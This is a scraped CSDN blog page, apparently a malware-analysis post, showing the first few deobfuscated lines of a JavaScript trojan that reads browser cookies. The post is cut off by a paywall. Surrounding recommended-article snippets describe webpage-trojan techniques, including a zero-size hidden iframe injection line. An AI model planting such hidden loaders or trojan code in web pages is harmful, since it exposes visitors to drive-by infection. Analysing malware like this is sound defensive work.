一个可恶的javascript病毒/木马解码之后的代码

最新推荐文章于 2024-03-06 20:09:03 发布
最新推荐文章于 2024-03-06 20:09:03 发布
阅读量9k 收藏 1
点赞数
分类专栏: 其它 文章标签: javascript string 浏览器 date 网络 ie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cangwu_lee/article/details/1862958
版权
本文分析了一个导致所有IE浏览器加载恶意脚本的JavaScript病毒/木马代码。该病毒通过设置Cookie并利用ActiveXObject创建不同组件,强制加载远程恶意JS文件,影响用户的网络浏览体验。清除此病毒较为复杂。
摘要由CSDN通过智能技术生成
中毒的话,整个网络都会受影响,表现为所有的IE浏览器打开的网页都会在前面加一个 javascript 的连接。清除比较麻烦。显示的这段是这个链接后面的代码:

var  vDA1  =   new  window[ " Date " ]() 
vDA1[ " setTime " ](vDA1[ " getTime " ]()  +   24 * 60 * 60 * 1000 )
 var  eOTo$ 2   =   new  window[ " String " ](window[ " document " ][ " cookie " ])
 var  eZT3  =   " Cookie1= "  
 var  VMliYvVKu4  =  eOTo$ 2 [ " indexOf " ](eZT3)
最低0.47元/天 解锁文章
cangwu_lee
关注
专栏目录
木马病毒
03-26
病毒则是指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码木马病毒的主要区别在于自传播性,病毒具有自我复制的能力,而木马则不具备...
网页木马太猖獗-网马反击战
weixin_34356555的博客
05-08 357
【标题】国家环保总局官方网站疑似被挂马—网页木马内容】         前段时间,我们的品牌通 联系通 等网站相继遭遇网页木马,深受其害。今天,无意中发现国家环保总局官方网站疑似被挂马。 现象截图:             网页木马相关技术总结:网页木马代码大全:一:框架挂马   <iframe src=地址 width=0 height=0></iframe> 二:js...
分享11个网页游戏和9个黑客源码,总有一款适合你(停止下载)
热门推荐
zy0412326的专栏
12-27 1万+
黑客和网页游戏源码 分享11个网页游戏和9个黑客源码,总有一款适合你源码下载地址:20个你喜欢的.rar - 蓝奏云 下面是文件的名字,我放了一些图片,文章里不是所有的图主要是放不下...,大家下载后可以看到。 PHP网页游戏xnova(ogame)-银河帝国v0.8版源码 JavaScript 连连看游戏代码[测试通过] JavaScript网页版泡泡龙游戏代码 基于JavaScript的植物大战僵尸版 v11.06.13 PHP+Flash网页游戏版斗地主 onWeb v2009 俄罗斯方块java
视频直播app源码,纯JS实现旋转木马/3d相册
云豹网络科技
05-18 239
4.遍历数组,使其沿y轴旋转Deg度。此处使用了原型,使用foreach方法遍历了数组,让其内每个图片都执行了function(el,index)。使用index下标区分开了数组内每个图片需要旋转的不同度数(第一张0°(Deg * 0) 第二张Deg度 (Deg * 1) 第三张(Deg * 2)度…以数组的形式获取,并根据其数组长度length来计算图片的旋转角度。以上就是 视频直播app源码,纯JS实现旋转木马/3d相册,更多内容欢迎关注之后的文章。视频直播app源码,纯JS实现旋转木马/3d相册。
网站被黑形式以及挂马病毒特征大全(附解决方案)
SEOer - 不二版本Eade的CSDN专栏
04-13 2895
如果下面的列表不包含您需要的判断,请使用Yandex 的通用说明对受感染的站点进行杀毒。 JS/AppndIfra-A 此判断意味着该页面包含混淆的 JavaScript 代码(变量和函数的名称可能因每个特定脚本而异)。执行后,此代码会从远程资源下载恶意 JavaScript 代码。该恶意代码通常包含在 body 元素的 onLoad 属性中。 按照我们的说明从服务器中删除恶意代码。 导致 JS/ApndIfra-A 判定的恶意代码示例: JS/DwnLdr-HOO 此判断意味着该页面包
JavaScript_这是你需要的最后一个旋转木马.zip
最新发布
05-21
"JavaScript_这是你需要的最后一个旋转木马.zip"这个压缩包文件很可能包含了一个JavaScript实现的旋转木马(Carousel)效果的代码示例或库。旋转木马通常用于展示一组图片或内容,用户可以前后滑动查看。这种效果...
jQuery旋转木马自动切换代码
04-07
1. **容器元素**:这是旋转木马的基础,通常是一个div元素,用来包含所有的图片或其他内容。 2. **图片/内容元素**:这些是旋转木马中显示的每个项目,它们应该具有相同的大小并堆叠在一起。 3. **导航按钮**:左右...
Delphi仿写的一个病毒木马实时监控模块.rar
07-10
Delphi仿写的一个病毒木马实时监控模块,资料包括:病毒木马标本、窗体背景图片、第三方控件、监视报告、软件发布之最佳伴侣_用户反馈表、程序报警或消息音效以及白名单等,注意源程序需要advapi32.dll。
恶性木马专杀工具解决顽固病毒木马浏览器首页劫持问题
04-07
在IT领域,安全是至关重要的一个环节,尤其是对于个人用户来说,电脑被恶意软件或木马病毒感染往往会导致诸多问题。本文将围绕标题“恶性木马专杀工具解决顽固病毒木马浏览器首页劫持问题”及相关的描述进行深入探讨...
JS木马的原理及防范方法
何足道也
09-21 3569
木马一直是黑客的拿手技量。善于用木马的黑客,可以在原来的入侵基础之上达到更大的目的。如今,虽然木马的种类有很多。但其中IFRAME挂马比较早,相应的预防措施也比较多,其中用CSS配合JS脚本进行预防是主流方式。可这种预防方式也存在安全隐患,JS脚本也可以被用来挂马,令人防不胜防。我们下面要介绍反击JS挂马的方法。 JS挂马溯源 当IFRAME逐渐被黑客滥用的时候,有经验的安全工程师也开始研究相
脚本病毒
HWP
11-14 6325
脚本病毒通常是由JavaScript代码编写的恶意代码,一般带有广告性质、 修改IE首页、修改注册表等信息。脚本病毒前缀是Sript,共同点是使用脚本语言编写,通过网页进行传播,如红色代码( Script.Redlof)。脚本病毒还会有其他前綴:VBS、JS (表明是何种脚本编写的),如欢乐时光( VBS.Happytime) ,十四日( JS.Fortnight.c.s)等。 VBS脚本病毒般是...
脚本病毒制作与分析
xlsj雪松的博客
05-21 4688
一、什么是脚本病毒 脚本病毒通常是 JavaScript 或 VBScript 等语言编写的恶意代码,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。 通过网页进行的传播的病毒较为典型,脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytim...
网页脚本病毒理解与防护
qq_61141142的博客
09-21 1987
一、脚本病毒的背景知识介绍 脚本病毒是指利用.asp、.htm、.html、.vbs、.js类型的文件进行传播的基于VB Script和Java Script脚本语言并由Windows Scripting Host解释执行的这类病毒。 脚本语言的功能非常强大,它们利用Windows系统具有开放性的特点,通过调用一些现成的Windows对象和组件,可以直接对文件系统、注册表等进行控制。脚本病毒正是利用脚本语言的这些特点,通过ActiveX进行网页传播,通过OE的自动发送邮件功能进行邮件传
“陷阱”病毒代码大揭密
thexiao的专栏
07-21 2276
   7月初在我国出现了一种名叫“陷阱”(Trap)的新型恶性病毒,并在7月5日全面爆发,目前国内已有不少的网站和用户遭受“陷阱”的袭击,造成网络系统瘫痪、文件丟失现象严重。该病毒是一种网络脚本语言病毒,并是同时使用了VBScript 和 JavaScript 两种脚本语言编写的,通过OutLook电子邮件传播(不打开邮件也能被感染)、感染文件传播,传播能力较强,并能直接攻击Microsoft I
谷歌插件开发:background.js 文件详解
m0_73088928的博客
05-09 3010
在谷歌浏览器的插件开发中,background.js 文件扮演着重要的角色。它是谷歌插件的核心文件之一,负责处理后台运行的任务和逻辑。。本节将详细介绍 background.js 的作用,以及需要注意的事项,并通过一个简单的Google插件示例让您能快速地掌握本节知识。
病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御
Gleam的专栏
03-26 1万+
前言 这次我与大家分享的是我所总结的关于JS下载者脚本木马的分析与防御技术。之所以要选择这样的一个题目,是因为在日常的病毒分析工作中,每天都会遇到这类病毒样本,少则几个,多则几十个(当然了,更多的样本已经被自动分析系统拦截下来了)。而且这类的样本甚至还有愈演愈烈之势,很可能会长盛不衰。JS脚本木马之所以会如此泛滥,与它的编写简单、易于免杀以及难以封堵等特点息息相关。而我们本次的课程也会
chrome浏览器插件v3 关于background.js的几点更新
qq_44450349的博客
11-25 6469
background.js不再支持ajax,使用fetch替代 示例: fetch(url, { method: 'POST', headers: { 'content-type': 'application/json' }, body: JSON.stringify(data), cache: 'no-cache', credentials: 'same-origin', mode: 'cors', redirect: 'follow', referre
伪装成NodeJS的勒索病毒,勒索呼伦贝尔的空气
pandazhengzheng的博客
02-11 1055
伪装成NodeJS的勒索病毒,勒索呼伦贝尔的空气
chrome浏览器插件content.js和background.js还有popup都是什么,怎么通讯
03-06 3961
在用户点击扩展程序图标时(下图中的下载图标),都可以设置弹出一个popup页面。而这个页面中自然是可以包含运行的js脚本的(比如就叫popup.js)。它会在每次点击插件图标——popup页面弹出时,重新载入。
JavaScript详述:实现美观旋转木马轮播图代码示例
在本文中,我们将深入探讨如何使用JavaScript来实现一个美观且功能丰富的旋转木马轮播图。JavaScript旋转木马轮播图是一种常见的网页交互元素,常用于展示多张图片,通过自动或手动切换,为用户带来动态的视觉体验。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值